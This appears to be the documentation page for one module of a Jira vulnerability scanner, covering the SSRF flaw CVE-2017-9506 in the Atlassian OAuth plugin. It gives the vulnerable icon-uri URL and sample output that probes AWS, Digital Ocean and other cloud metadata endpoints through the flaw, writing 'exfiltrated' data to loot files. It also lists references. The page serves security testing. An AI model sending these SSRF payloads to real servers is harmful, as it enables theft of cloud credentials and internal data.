CVE-2017-9506

Category: [SSRF]

module name: check_cve_2017_9506

url: /plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com

INFO: Checking for CVE-2017-9506 (SSRF)
[Testing URL]: https://JIRASERVER/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
[+] [SSRF] Vulnerable to CVE-2017-9506 (SSRF): https://JIRASERVER/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
	Checking AWS Metadata
	----> AWS Metadata Found: https://JIRASERVER/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data/
	Checking Alibaba Metadata
	----> Alibaba Metadata Not Found
- HTTP Code: 500
	Checking Docker Containers
	----> Docker Containers Not Found
- HTTP Code: 500
	Checking Kubernetes ETCD API keys
	----> Kubernetes ETCD API keys Not Found
- HTTP Code: 500

Exfiltrated data written to: loot/CVE-2017-9506_1.2.3.4.txt

INFO: Checking for CVE-2017-9506 (SSRF)
[Testing URL]: http://10.10.10.10:8080/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
[!!] [SSRF] Vulnerable to CVE-2017-9506 (SSRF): http://10.10.10.10:8080/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
	Checking AWS Metadata
	----> AWS Metadata Not Found
	----> HTTP Code: 500
	Checking Alibaba Metadata
	----> Alibaba Metadata Not Found
	----> HTTP Code: 500
	Checking Docker Containers
	----> Docker Containers Not Found
	----> HTTP Code: 500
	Checking Kubernetes ETCD API keys
	----> Kubernetes ETCD API keys Not Found
	----> HTTP Code: 500
	Checking Digital Ocean Metadata
	----> Digital Ocean Metadata Found: http://10.10.10.10:8080/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/metadata/v1.json
	Checking Oracle Cloud
	----> Oracle Cloud Not Found
	----> HTTP Code: 500

Exfiltrated data written to: loot/CVE-2017-9506_10.10.10.10:8080.txt

References

• https://hackerone.com/reports/326040

• https://infosecwriteups.com/piercing-the-veil-server-side-request-forgery-to-niprnet-access-c358fd5e249a

• https://www.acunetix.com/vulnerabilities/web/atlassian-oauth-plugin-iconuriservlet-ssrf/

• https://jira.atlassian.com/browse/JRASERVER-65862

The version of the bundled Atlassian OAuth plugin was vulnerable to Server Side Request Forgery (SSRF). This allowed a XSS and or a SSRF attack to be performed. More information about the Atlassian OAuth plugin issue see https://ecosystem.atlassian.net/browse/OAUTH-344 . When running in an environment like Amazon EC2, this flaw can used to access to a metadata resource that provides access credentials and other potentially confidential information.